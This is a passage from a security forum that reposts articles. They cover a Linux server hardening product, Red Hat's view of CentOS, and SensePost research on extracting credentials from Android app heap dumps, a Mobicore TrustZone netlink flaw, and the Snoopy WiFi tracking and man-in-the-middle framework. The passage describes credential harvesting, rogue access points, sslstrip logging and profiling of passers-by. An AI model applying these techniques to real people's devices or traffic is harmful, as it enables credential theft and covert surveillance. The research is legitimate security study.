many features from the GUI. It protects from cross-site scripting, SQL injection, remote code inclusion, and many other web-based attacks. It intelligently detects search engines to prevent accidental blocking of web crawlers. It detects suspicious events and events of importance and sends alerts about events such as privilege escalation, software installation and modification, file privilege changes, and more. ASL detects suspicious processes, files, user actions, hidden ports, kernel activity, open ports, and more. It has a built-in vulnerability and compliance scanner and remediation system to ensure that your system is operating in a safe, secure, and compliant manner. It automatically hardens Linux servers based on security policies and ships with a world-class set of policies developed by security experts. Also, it automatically disables unsafe functions in web technologies such as PHP to help prevent entire classes of vulnerabilities; for example, executing PHP shells. It detects and blocks brute force and “low and slow” attacks on web applications and intelligently identifies when a web application has denied access, even for login failures. Alerting is done for all domains hosted on a server. The graphical user interface of the firewall is easy to use and maintain. The advanced configuration of ASL allows handling PHP shell functions, antivirus, mod security rules, rootkit hunter, etc. Hence we conclude that, after doing these things, your web server will be secured from attacks. Nowadays, most of the websites hacked are hosted by a shared server. An attacker’s main method is to upload a PHP shell to a web server through a vulnerable website, from which an attacker can deface all websites hosted on that server. That’s why we suggest using cPanel, because cPanel provides separate accounts for all website owners; if an attacker can upload a PHP shell from a website, he will not have access to all the other websites that are hosted on that server, he can only deface that particular site. We also discussed Atomic Secured Linux: It blocks attacks and alerts from all types of attacks. Specifically, it blocks the PHP shell functions and disables the PHP shell from executing in the web server. References CentOS/REL - Installing cPanel & WHM 11.24 | Knowledge Center | Rackspace Hosting https://www.atomicorp.com/products/asl.html Sursa: WEB SERVER SECURITY
  17. x86 Code Virtualizer Src Fh_prg Hello every body Here is my code virtualizer source code , now public download and enjoy Attached Files VM.zip (153.9 KB, 48 views) Sursa: x86 Code Virtualizer Src
      • 1
      • Like
  18. rstforums.com/forum/74095-coca-cola-666-a.rst OMG, RST e posedat! FALS. Noi suntem diavolii, noi nu putem fi posedati.
  19. Super, sper sa fie si cativa open-source.
  20. Toata lumea vine la Sud.
  21. Red Hat CEO: Go Ahead, Copy Our Software While most companies fight copycats, Red Hat embraces its top clone, CentOS. Here's how that helps it fight real enemies like VMware. Matt Asay August 13, 2013 Imagine your company spent more than $100 million developing a product. Now imagine that a competitor came along and cloned your product and distributed a near-perfect replica of it. Not good, right? If you're Apple, you spend years and tens of millions of dollars fighting it, determined to be the one and only source of your product. If you're Red Hat, however, you embrace it—as Red Hat CEO Jim Whitehurst told ReadWrite in an interview. After Unix For years the enterprise data center was defined by expensive hardware running varieties of the Unix operating system. Over time, both Windows and Linux chewed into Unix's market share, with Red Hat winning the bulk of the Linux spoils. The key to victory? Both Windows and Linux offered low-cost, high-value alternatives to Unix's sky-high pricing. With Unix cowering in a corner, one would think that the battle would shift to Linux versus Windows. The reality, however, is somewhat different. As Whitehurst tells it, Red Hat "certainly competes" with Microsoft, but "generally those IT decisions are made at the architecture level before you get into a specific Linux versus Windows bake-off." Today enterprise architecture tends to be Linux-based, while 10 years ago it was Windows, which means that more often than not, Red Hat Enterprise Linux is baked into enterprise IT decisions. "Going forward with new workloads, they are heavily Linux-based," notes Whitehurst. As such, Whitehurst doesn't "worry about Microsoft long-term, because it's Red Hat and VMware that are defining future data center strategy." Taking On VMware Ah, yes, VMware. Sun Microsystems, in its day the leading Unix vendor but now swallowed up by Oracle, once provided Red Hat with a handy villain to target. Today data-center software maker VMware is Red Hat's Enemy Number One. The reason is simple: No other company more closely matches Red Hat's ambitions, albeit with a very different approach. As Whitehurst emphasizes, "When you start thinking about where the future of the data center is going, VMware has a similar view to ours, but they're doing it with a proprietary innovation model and we're open." How open? So open that not only is Red Hat fighting VMware with its own open-source products, but it's also embracing clones like CentOS. While open source is increasingly established within the technology world, few understand its implications for an open-source software business. In the case of Red Hat, it develops the popular Red Hat Enterprise Linux (RHEL) operating system. But because Linux is a community-developed OS, Red Hat must release all of its Linux code to others. (Instead of charging for a software license per se, Red Hat has customers pay for a subscription that covers services and support.) This paves the way for an organization like CentOS to develop a "a Linux distribution derived from ... a prominent North American Enterprise Linux vendor" which "aims to be 100% binary compatible" with that Linux vendor. It's the imitator that dare not speak its name, but everyone knows CentOS is a like-for-like Red Hat clone. How can this possibly be good for Red Hat? Embracing The Parasite While some like Microsoft have threatened Red Hat with the specter of even greater competition from CentOS, Whitehurst argues that CentOS "plays a very valuable role in our ecosystem." How? By ensuring that Red Hat remains the Linux default: CentOS is one of the reasons that the RHEL ecosystem is the default. It helps to give us an ubiquity that RHEL might otherwise not have if we forced everyone to pay to use Linux. So, in a micro sense we lose some revenue, but in a broader sense, CentOS plays a very valuable role in helping to make Red Hat the de facto Linux. But couldn't another Linux vendor like SuSE or Canonical, the primary backer of Ubuntu, undercut Red Hat with an equally free OS? If $0 is the magic price point, other Linux vendors can easily match that, right? Whitehurst responds: "SuSE often comes in at a lower price point than RHEL, but most people would prefer to have a common code base like RHEL plus CentOS than a cheaper but always fee-based enterprise SuSE." In other words, only Red Hat can offer the industry's leading Linux server OS and also offer—albeit indirectly—that same product for free. Microsoft has tacitly acknowledged a similar phenomenon: While the company spends heavily to fight piracy, founder Bill Gates noted in 1998 that illegal copies of its Windows operating system in China helped seed demand for the paid version. While I'm sure Red Hat's salesforce doesn't love competing with its copycat, the reality is that sales are almost certainly helped in accounts that only want RHEL for production servers and can shave costs by using CentOS for development and test servers. CentOS, in other words, gives Red Hat a lot of pricing leverage, without having to lower its prices. Embracing Developers Arguably one critical area that CentOS hasn't helped Red Hat is with developers. While developers want the latest and greatest technology, Red Hat's bread-and-butter audience over the years has been operations departments, which want stable and predictable software. (Read: boring.) CentOS, by cloning RHEL's slow-and-steady approach to Linux development, is ill-suited to attracting developers. So Red Hat is trying something different, dubbed Red Hat Software Collections. Collections includes "a collection of refreshed and supported web/dynamic languages and databases for Red Hat Enterprise Linux." Basically, Collections give developers a more fast-moving development track within slower-moving RHEL. Or, as Whitehurst tells it, "Collections is Red Hat's way of embracing developers while keeping its appeal for operations." It will be interesting to see how this plays out. Red Hat has a long way to go in its goal to define the open data center, but with its embrace of CentOS to give it licensing leverage and of Collections to give it developer credibility, Red Hat is on the right track. Sursa: http://readwrite.com/2013/08/13/red-hat-ceo-centos-open-source
  22. [h=1]Poking Around in Android Memory[/h] Tags: memory, analysis, mobile, programming, public — etienne @ 16:31 Taking inspiration from Vlad's post I've been playing around with alternate means of viewing traffic/data generated by Android apps. The technique that has given me most joy is memory analysis. Each application on android is run in the Dalvik VM and is allocated it's own heap space. Android being android, free and open, numerous ways of dumping the contents of the application heap exist. There's even a method for it in the android.os.Debug library: android.os.Debug.dumpHprofData(String filename). You can also cause a heap dump by issuing the kill command: kill -10 <pid number> But there is an easier way, use the official Android debugging tools... Dalvik Debug Monitor Server (DDMS), -- "provides port-forwarding services, screen capture on the device, thread and heap information on the device, logcat, process, and radio state information, incoming call and SMS spoofing, location data spoofing, and more." Once DDMS is set up in Eclipse, it's simply a matter of connecting to your emulator, picking the application you want to investigate and then to dump the heap (hprof). 1.) Open DDMS in Eclipse and attach your device/emulator * Set your DDMS "HPROF action" option to "Open in Eclipse" - this ensures that the dump file gets converted to standard java hprof format and not the Android version of hprof. This allows you to open the hpof file in any java memory viewer. * To convert a android hprof file to java hprof use the hprof converter found in the android-sdk/platform-tools directory: hprof-conv <infile> <outfile> 2.) Dump hprof data Once DDMS has done it's magic you'll have a window pop up with the memory contents for your viewing pleasure. You'll immediately see that the applications UI objects and other base classes are in the first part of the file. Scrolling through you will start seeing the values of variables stored in memory. To get to the interesting stuff we can use the command-line. 3.) strings and grep the .hprof file (easy stuff) To demonstrate the usefulness of memory analysis lets look at two finance orientated apps. The first application is a mobile wallet application that allows customers to easily pay for services without having to carry cash around. Typically one would do some static analysis of the application and then when it comes to dynamic analysis you would use a proxy such as Mallory or Burp to view the network traffic. In this case it wasn't possible to do this as the application employed certificate pinning and any attempt to man in the middle the connection caused the application to exit with a "no network connection" error. So what does memory analysis have to do with network traffic? As it turns out, a lot. Below is a sample of the data extracted from memory: And there we have it, the user login captured along with the username and password in the clear. Through some creative strings and grep we can extract a lot of very detailed information. This includes credit card information, user tokens and products being purchased. Despite not being able to alter data in the network stream, it is still easy to view what data is being sent, all this without worrying about intercepting traffic or decrypting the HTTPS stream. A second example application examined was a banking app. After spending some time using the app and then doing a dump of the hprof, we used strings and grep (and some known data) we could easily see what is being stored in memory. strings /tmp/android43208542802109.hprof | grep '92xxxxxx' Using part of the card number associated with the banking app, we can locate any references to it in memory. And we get a lot of information.. And there we go, a fully "decrypted" JSON response containing lots of interesting information. Grep'ing around yields other interesting values, though I haven't managed to find the login PIN yet (a good thing I guess). Next step? Find a way to cause a memory dump in the banking app using another app on the phone, extract the necessary values and steal the banking session, profit. Memory analysis provides an interesting alternate means of finding data within applications, as well as allowing analysts to decipher how the application operates. The benefits are numerous as the application "does all the work" and there is no need to intercept traffic or figure out the decryption routines used. [h=3]Appendix:[/h] The remoteAddress field in the response is very interesting as it maps back to a range owned by Merck (one of the largest pharmaceutical companies in the world Merck & Co. - Wikipedia, the free encyclopedia) .. No idea what it's doing in this particular app, but it appears in every session I've looked at. - See more at: SensePost Blog
  23. A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone Tags: mobile, programming, public, python — behrang @ 13:35 Introduction: New types of mobile applications based on Trusted Execution Environments (TEE) and most notably ARM TrustZone micro-kernels are emerging which require new types of security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture communication between the Android application and TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low privileged Android processes and Mobicore enabled kernel drivers such as an IPSEC driver. Mobicore OS : The Samsung Galaxy S III was the first mobile phone that utilized ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel named Mobicore is isolated from the handset's Android operating system in the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) which uses TrustZone security extension of ARM processors to create a secure program execution and data storage environment which sits next to the rich operating system (Android, Windows , iOS) of the Mobile phone or tablet. The following figure published by G&D demonstrates Mobicore's architecture : Overview of Mobicore (courtesy of G&D) A TrustZone enabled processor provides "Hardware level Isolation" of the above "Normal World" (NWd) and "Secure World" (SWd) , meaning that the "Secure World" OS (Mobicore) and programs running on top of it are immune against software attacks from the "Normal World" as well as wide range of hardware attacks on the chip. This forms a "trusted execution environment" (TEE) for security critical application such as digital wallets, electronic IDs, Digital Rights Management and etc. The non-critical part of those applications such as the user interface can run in the "Normal World" operating system while the critical code, private encryption keys and sensitive I/O operations such as "PIN code entry by user" are handled by the "Secure World". By doing so, the application and its sensitive data would be protected against unauthorized access even if the "Normal World" operating system was fully compromised by the attacker, as he wouldn't be able to gain access to the critical part of the application which is running in the secure world. Mobicore API: The security critical applications that run inside Mobicore OS are referred to as trustlets and are developed by third-parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets as well as Android applications that communicate with relevant trustlets via Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). Mobicore API for Android consists of the following 3 components: 1) Mobicore client library located at /system/lib/libMcClient.so: This is the library file used by Android OS or Dalvik applications to establish communication sessions with trustlets on the secure world 2) Mobicore Daemon located at /system/bin/mcDriverDaemon: This service proxies Mobicore commands and responses between NWd and SWd via Mobicore device driver 3) Mobicore device driver: Registers /dev/mobicore device and performs ARM Secure Monitor Calls (SMC) to switch the context from NWd to SWd The source code for the above components can be downloaded from Google Code. I enabled the verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis. Please note that you need to download the relevant kernel source tree and stock ROM for your S3 phone kernel build number which can be found in "Settings->About device". After compiling the new zImage file, you would need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217" which has the option to unpack zImage from the stock ROM, replace it with the newly compiled zImage and pack it again. By studying the source code of the user API library and observing debug messages from the kernel driver, I figured out the following data flow between the android OS and Mobicore to establish a session and communicate with a trustlet: 1) Android application calls mcOpenDevice() API which cause the Mobicore Daemon (/system/bin/mcDriverDaemon) to open a handle to /dev/mobicore misc device. 2) It then allocates a "Worlds share memory" (WSM) buffer by calling mcMallocWsm() that cause the Mobicore kernel driver to allocate wsm buffer with the requested size and map it to the user space application process. This shared memory buffer would later be used by the android application and trustlet to exchange commands and responses. 3) The mcOpenSession() is called with the UUID of the target trustlet (10 bytes value, for instance : ffffffff000000000003 for PlayReady DRM truslet) and allocate wsm address to establish a session with the target trustlet through the allocated shared memory. 4) Android applications have the option to attach additional memory buffers (up to 6 with maximum size of 1MB each) to the established session by calling mcMap() API. In case of PlayReady DRM trustlet which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving the parameters and the other for receiving trustlet's text output. 5) The application copies the command and parameter types to the WSM along with the parameter values in second allocated buffer and then calls mcNotify() API to notify the Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet. 6) The mcWaitNotification() API is called with the timeout value which blocks until a response received from the trustlet. If the response was not an error, the application can read trustlets' returned data, output text and parameter values from WSM and the two additional mapped buffers. 7) At the end of the session the application calls mcUnMap, mcFreeWsm and mcCloseSession . The Mobicore kernel driver is the only component in the android operating system that interacts directly with Mobicore OS by use of ARM CPU's SMC instruction and Secure Interrupts . The interrupt number registered by Mobicore kernel driver in Samsung S3 phone is 47 that could be different for other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in android OS when it writes back data. Analysis of a Mobicore session: There are currently 5 trustlets pre-loaded on the European S3 phones as listed below: shell@android:/ # ls /data/app/mcRegistry 00060308060501020000000000000000.tlbin 02010000080300030000000000000000.tlbin 07010000000000000000000000000000.tlbin ffffffff000000000000000000000003.tlbin ffffffff000000000000000000000004.tlbin ffffffff000000000000000000000005.tlbin The 07010000000000000000000000000000.tlbin is the "Content Management" trustlet which is used by G&D to install/update other trustlets on the target phones. The 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin are DRM related truslets developed by Discretix. I chose to analyze PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it was used by the Samsung videohub application which is pre-loaded on the European S3 phones. The videohub application dose not directly communicate with PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins including libdxdrmframeworkplugin.so which is dependent on libDxDrmServer.so library that makes Mobicore API calls. Both of these libraries are closed source and I had to perform dynamic analysis to monitor communication between libDxDrmServer.so and PlayReady trustlet. For this purpose, I could install API hooks in android DRM manager process (drmserver) and record the parameter values passed to Mobicore user library (/system/lib/libMcClient.so) by setting LD_PRELOAD environment variable in the init.rc script and flash my phone with the new ROM. I found this approach unnecessary, as the source code for Mobicore user library was available and I could add simple instrumentation code to it which saves API calls and related world shared memory buffers to a log file. In order to compile such modified Mobicore library, you would need to the place it under the Android source code tree on a 64 bit machine (Android 4.1.1 requires 64 bit machine to compile) with 30 GB disk space. To save you from this trouble, you can download a copy of my Mobicore user library from here. You need to create the empty log file at /data/local/tmp/log and replace this instrumented library with the original file (DO NOT FORGET TO BACKUP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and PlayReady trustlet will be logged into /data/local/tmp/log. A sample of such session log is shown below: The content and address of the shared world memory and two additional mapped buffers are recorded in the above file. The command/response format in wsm buffer is very similar to APDU communication in smart card applications and this is not a surprise, as G&D has a long history in smart card technology. The next step is to interpret the command/response data, so that we can manipulate them later and observe the trustlet behavior. The trustlet's output in text format together with inspecting the assembly code of libDxDrmServer.so helped me to figure out the PlayReady trustlet command and response format as follows: client command (wsm) : 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000 client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b trustlet response (wsm):08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000 trustltlet text output (mapped buffer 2): ================================================== SRVXInvokeCommand command 1000000 hSession=320b4 SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25 SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074 SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48 SERVICE_DRM_BBX_SetKeyToOemContext type=5 SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48 SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4 DxDecryptAsset calling Oem_Aes_SetKey DxDecryptAsset calling DRM_Aes_CtrProcessData DxDecryptAsset calling DRM_HMAC_CreateMAC iDatatLen=32 DxDecryptAsset after calling DRM_HMAC_CreateMAC DxDecryptAsset END SERVICE_DRM_BBX_SetKeyToOemContext calling DRM_BBX_SetKeyToOemContext SRVXInvokeCommand.id=0x1000000 res=0x0 ============================================== By mapping the information disclosed in the trustlet text output to the client command the following format was derived: 08022000 : virtual memory address of the text output buffer in the secure world (little endian format of 0x200208) b4200300 : PlayReady session ID 00000001: Command ID (0x1000000) 00000000: Error code (0x0 = no error, is set by truslet after mcWaitNotification) 25000000: Parameter type (0x25) 28023000: virtual memory address of the parameters buffer in the secure world (little endian format of 0x300228) 30000000: Parameters length in bytes (0x30, encrypted key length) 05000000: encryption key type (0x5) The trustlet receives client supplied memory addresses as input data which could be manipulated by an attacker. We'll test this attack later. The captured PlayReady session involved 18 command/response pairs that correspond to the following high level diagram of PlayReady DRM algorithm published by G&D. I couldn't find more detailed specification of the PlayReady DRM on the MSDN or other web sites. But at this stage, I was not interested in the implementation details of the PlayReady schema, as I didn't want to attack the DRM itself, but wanted to find any exploitable issue such as a buffer overflow or memory disclosure in the trustlet. DRM Trustlet diagram (courtesy of G&D) Security Tests: I started by auditing the Mobicore daemon and kernel driver source code in order to find issues that can be exploited by an android application to attack other applications or result in code execution in the Android kernel space. I find one issue in the Mobicore kernel API which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers Linux netLink server with id=17 which was intended to be called from the kernel space, however a Linux user space process can create a spoofed message using NETLINK sockets and send it to the Mobicore kernel driver netlink listener which as shown in the following figure did not check the PID of the calling process and as a result, any Android app could call Mobicore APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below. An attacker would need to know the "sequence number" of an already established netlink connection between a kernel component such as IPSEC and Mobicore driver in order to exploit this vulnerability. This sequence numbers were incremental starting from zero but currently there is no kernel component on the Samsung phone that uses the Mobicore API, thus this issue was not a high risk. We notified the vendor about this issue 6 months ago but haven't received any response regarding the planned fix. The following figures demonstrate exploitation of this issue from an Android unprivileged process : Netlink message (seq=1) sent to Mobicore kernel driver from a low privileged process Unauthorised netlink message being processed by the Mobicore kernel driver In the next phase of my tests, I focused on fuzzing the PlayReady DRM trustlet that mentioned in the previous section by writing simple C programs which were linked with libMcClient.so and manipulating the DWORD values such as shared buffer virtual address. The following table summarises the results: [TABLE] [TR] [TD]wsm offset[/TD] [TD]Description[/TD] [TD]Results[/TD] [/TR] [TR] [TD]0[/TD] [TD]Memory address of the mapped output buffer in trustlet process (original value=0x08022000)[/TD] [TD]for values<0x8022000 the fuzzer crashed values >0x8022000 no errors[/TD] [/TR] [TR] [TD]41[/TD] [TD]memory address of the parameter mapped buffer in trusltet process (original value=0x28023000)[/TD] [TD]0x00001000<value<0x28023000 the fuzzer crashed value>=00001000 trustlet exits with "parameter refers to secure memory area" value>0x28023000 no errors[/TD] [/TR] [TR] [TD]49[/TD] [TD]Parameter length (encryption key or certificate file length)[/TD] [TD]For large numbers the trustlet exits with "malloc() failed" message[/TD] [/TR] [/TABLE] The fuzzer crash indicated that Mobicore micro-kernel writes memory addresses in the normal world beyond the shared memory buffer which was not a critical security issue, because it means that fuzzer can only attack itself and not other processes. The "parameter refers to secure memory area" message suggests that there is some sort of input validation implemented in the Mobicore OS or DRM trustlet that prevents normal world's access to mapped addresses other than shared buffers. I haven't yet run fuzzing on the parameter values itself such as manipulating PlayReady XML data elements sent from the client to the trustlet. However, there might be vulnerabilities in the PlayReady implementation that can be picked up by smarter fuzzing. Conclusion: We demonstrated that intercepting and manipulating the worlds share memory (WSM) data can be used to gain better knowledge about the internal workings of Mobicore trustlets. We believe that this method can be combined with the side channel measurements to perform blackbox security assessment of the mobile TEE applications. The context switching and memory sharing between normal and secure world could be subjected to side channel attacks in specific cases and we are focusing our future research on this area. - See more at: SensePost Blog
  24. At this year's 44Con conference (held in London) Daniel and I introduced a project we had been working on for the past few months. Snoopy, a distributed tracking and profiling framework, allowed us to perform some pretty interesting tracking and profiling of mobile users through the use of WiFi. The talk was well received (going on what people said afterwards) by those attending the conference and it was great to see so many others as excited about this as we have been. In addition to the research, we both took a different approach to the presentation itself. A 'no bullet points' approach was decided upon, so the slides themselves won't be that revealing. Using Steve Jobs as our inspiration, we wanted to bring back the fun to technical conferences, and our presentation hopefully represented that. As I type this, I have been reliably informed that the DVD, and subsequent videos of the talk, is being mastered and will be ready shortly. Once we have it, we will update this blog post. In the meantime, below is a description of the project. Background There have been recent initiatives from numerous governments to legalise the monitoring of citizens' Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism. Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere. Snoopy The above inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data? Rather than terrorist-hunting, we would perform simple tracking and real-time + historical profiling of devices and the people who own them. It is perhaps worth mentioning at this point that Snoopy is compromised of various existing technologies combined into one distributed framework. "Snoopy is a distributed tracking and profiling framework." Below is a diagram of the Snoopy architecture, which I'll elaborate on: 1. Distributed? Snoopy runs client side code on any Linux device that has support for wireless monitor mode / packet injection. We call these "drones" due to their optimal nature of being small, inconspicuous, and disposable. Examples of drones we used include the Nokia N900, Alfa R36 router, Sheeva plug, and the RaspberryPi. Numerous drones can be deployed over an area (say 50 all over London) and each device will upload its data to a central server. 2. WiFi? A large number of people leave their WiFi on. Even security savvy folk; for example at BlackHat I observed >5,000 devices with their WiFi on. As per the RFC documentation (i.e. not down to individual vendors) client devices send out 'probe requests' looking for networks that the devices have previously connected to (and the user chose to save). The reason for this appears to be two fold; (i) to find hidden APs (not broadcasting beacons) and (ii) to aid quick transition when moving between APs with the same name (e.g. if you have 50 APs in your organisation with the same name). Fire up a terminal and bang out this command to see these probe requests: tshark -n -i mon0 subtype probereq (where mon0 is your wireless device, in monitor mode) 2. Tracking? Each Snoopy drone collects every observed probe-request, and uploads it to a central server (timestamp, client MAC, SSID, GPS coordinates, and signal strength). On the server side client observations are grouped into 'proximity sessions' - i.e device 00:11:22:33:44:55 was sending probes from 11:15 until 11:45, and therefore we can infer was within proximity to that particular drone during that time. We now know that this device (and therefore its human) were at a certain location at a certain time. Given enough monitoring stations running over enough time, we can track devices/humans based on this information. 3. Passive Profiling? We can profile device owners via the network SSIDs in the captured probe requests. This can be done in two ways; simple analysis, and geo-locating. Simple analysis could be along the lines of "Hmm, you've previously connected to hooters, mcdonalds_wifi, and elCheapoAirlines_wifi - you must be an average Joe" vs "Hmm, you've previously connected to "BA_firstclass, ExpensiveResataurant_wifi, etc - you must be a high roller". Of more interest, we can potentially geo-locate network SSIDs to GPS coordinates via services like Wigle (whose database is populated via wardriving), and then from GPS coordinates to street address and street view photographs via Google. What's interesting here is that as security folk we've been telling users for years that picking unique SSIDs when using WPA[2] is a "good thing" because the SSID is used as a salt. A side-effect of this is that geo-locating your unique networks becomes much easier. Also, we can typically instantly tell where you work and where you live based on the network name (e.g BTBusinessHub-AB12 vs BTHomeHub-FG12). The result - you walk past a drone, and I get a street view photograph of where you live, work and play. 4. Rogue Access Points, Data Interception, MITM attacks? Snoopy drones have the ability to bring up rogue access points. That is to say, if your device is probing for "Starbucks", we'll pretend to be Starbucks, and your device will connect. This is not new, and dates back to Karma in 2005. The attack may have been ahead of its time, due to the far fewer number of wireless devices. Given that every man and his dog now has a WiFi enabled smartphone the attack is much more relevant. Snoopy differentiates itself with its rogue access points in the way data is routed. Your typical Pineapple, Silica, or various other products store all intercepted data locally, and mangles data locally too. Snoopy drones route all traffic via an OpenVPN connection to a central server. This has several implications: (i) We can observe traffic from *all* drones in the field at one point on the server. (ii) Any traffic manipulation needs only be done on the server, and not once per drone. (iii) Since each Drone hands out its own DHCP range, when observing network traffic on the server we see the source IP address of the connected clients (resulting in a unique mapping of MAC <-> IP <-> network traffic). (iv) Due to the nature of the connection, the server can directly access the client devices. We could therefore run nmap, Metasploit, etc directly from the server, targeting the client devices. This is a much more desirable approach as compared to running such 'heavy' software on the Drone (like the Pineapple, pr Pwnphone/plug would). (v) Due to the Drone not storing data or malicious tools locally, there is little harm if the device is stolen, or captured by an adversary. On the Snoopy server, the following is deployed with respect to web traffic: (i) Transparent Squid server - logs IP, websites, domains, and cookies to a database (ii) sslstrip - transparently hijacks HTTP traffic and prevent HTTPS upgrade by watching for HTTPS links and redirecting. It then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. All credentials are logged to the database (thanks Ian & Junaid). (iii) mitmproxy.py - allows for arbitary code injection, as well as the use of self-signed SSL certificates. By default we inject some JavaScipt which profiles the browser to discern the browser version, what plugins are installed, etc (thanks Willem). Additionally, a traffic analysis component extracts and reassembles files. e.g. PDFs, VOiP calls, etc. (thanks Ian). 5. Higher Level Profiling? Given that we can intercept network traffic (and have clients' cookies/credentials/browsing habbits/etc) we can extract useful information via social media APIs. For example, we could retrieve all Facebook friends, or Twitter followers. 6. Data Visualization and Exploration? Snoopy has two interfaces on the server; a web interface (thanks Walter), and Maltego transforms. -The Web Interface The web interface allows basic data exploration, as well as mapping. The mapping part is the most interesting - it displays the position of Snoopy Drones (and client devices within proximity) over time. This is depicted below: -Maltego Maltego Radium has recently been released; and it is one awesome piece of kit for data exploration and visualisation.What's great about the Radium release is that you can combine multiple transforms together into 'machines'. A few example transformations were created, to demonstrate: 1. Devices Observed at both 44Con and BlackHat Vegas Here we depict devices that were observed at both 44Con and BlackHat Las Vegas, as well as the SSIDs they probed for. 2. Devices at 44Con, pruned Here we look at all devices and the SSIDs they probed for at 44Con. The pruning consisted of removing all SSIDs that only one client was looking for, or those for which more than 20 were probing for. This could reveal 'relationship' SSIDs. For example, if several people from the same company were attending- they could all be looking for their work SSID. In this case, we noticed the '44Con crew' network being quite popular. To further illustrate Snoopy we 'targeted' these poor chaps- figuring out where they live, as well as their Facebook friends (pulled from intercepted network traffic*). Snoopy Field Experiment We collected broadcast probe requests to create two main datasets. I collected data at BlackHat Vegas, and four of us sat in various London underground stations with Snoopy drones running for 2 hours. Furthermore, I sat at King's Cross station for 13 hours (!?) collecting data. Of course it may have made more sense to just deploy an unattended Sheeva plug, or hide a device with a large battery pack - but that could've resulted in trouble with the law (if spotted on CCTV). I present several graphs depicting the outcome from these trials: The pi chart below depicts the proportion of observed devices per vendor, from the total sample of 77,498 devices. It is interesting to see Apple's dominance. pi_chart The barchart below depicts the average number of broadcast SSIDs from a random sample of 100 devices per vendor (standard deviation bards need to be added - it was quite a spread). The barchart below depicts my day sitting at King's Cross station. The horizontal axis depicts chunks of time per hour, and the vertical access number of unique device observations. We clearly see the rush hours. Potential Use What could be done with Snoopy? There are likely legal, borderline, and illegal activities. Such is the case with any technology. Legal -Collecting anonymized statistics on thoroughfare. For example, Transport for London could deploy these devices at every London underground to get statistics on peak human traffic. This would allow them to deploy more staff, or open more pathways, etc. Such data over the period of months and years would likely be of use for future planning. -Penetration testers targeting clients to demonstrate the WiFi threat. Borderline -This type of technology could likely appeal to advertisers. For example, a reseller of a certain brand of jeans may note that persons who prefer certain technologies (e.g. Apple) frequent certain locations. -Companies could deploy Drones in one of each of their establishments (supermarkets, nightclubs, etc) to monitor user preference. E.g. a observing a migration of customers from one establishment to another after the deployment of certain incentives (e.g. promotions, new layout). -Imagine the Government deploying hundreds of Drones all over a city, and then having field agents with mobile Drones in their pockets. This could be a novel way to track down or follow criminals. The other side of the coin of course being that they track all of us... Illegal -Let's pretend we want to target David Beckham. We could attend several public events at which David is attending (Drone in pocket), ensuring we are within reasonable proximity to him. We would then look for overlap of commonly observed devices over time at all of these functions. Once we get down to one device observed via this intersection, we could assume the device belongs to David. Perhaps at this point we could bring up a rogue access point that only targets his device, and proceed maliciously from there. Or just satisfy ourselves by geolocating places he frequents. -Botnet infections, malware distribution. That doesn't sound very nice. Snoopy drones could be used to infect users' devices, either by injection malicious web traffic, or firing exploits from the Snoopy server at devices. -Unsolicited advertising. Imagine browsing the web, and an unscrupulous 3rd party injects viagra adverts at the top of every visited page? Similar tools Immunity's Stalker and Silica Hubert's iSniff GPS Snoopy in the Press Risky Biz Podcast Naked Scientist Podcast(transcript) The Register Fierce Broadband Wireless ***FAQ*** Q. But I use WPA2 at home, you can't hack me! A. True - if I pretend to be a WPA[2] network association it will fail. However, I bet your device is probing for at least one open network, and when I pretend to be that one I'll get you. Q. I use Apple/Android/Foobar - I'm safe! A. This attack is not dependent on device/manufacture. It's a function of the WiFi specification. The vast majority of observed devices were in fact Apple (>75%). Q. How can I protect myself? A. Turn off your WiFi when you l leave home/work. Be cautions about using it in public places too - especially on open networks (like Starbucks). A. On Android and on your desktop/laptop you can selectively remove SSIDs from your saved list. As for iPhones there doesn't seem to be option - please correct me if I'm wrong? A. It'd be great to write an application for iPhone/Android that turns off probe-requests, and will only send them if a beacon from a known network name is received. Q. Your research is dated and has been done before! A. Some of the individual components, perhaps. Having them strung together in our distributed configuration is new (AFAIK). Also, some original ideas where unfortunately published first; as often happens with these things. Q. But I turn off WiFi, you'll never get me! A. It was interesting to note how many people actually leave WiFi on. e.g. 30,000 people at a single London station during one day. WiFi is only one avenue of attack, look out for the next release using Bluetooth, 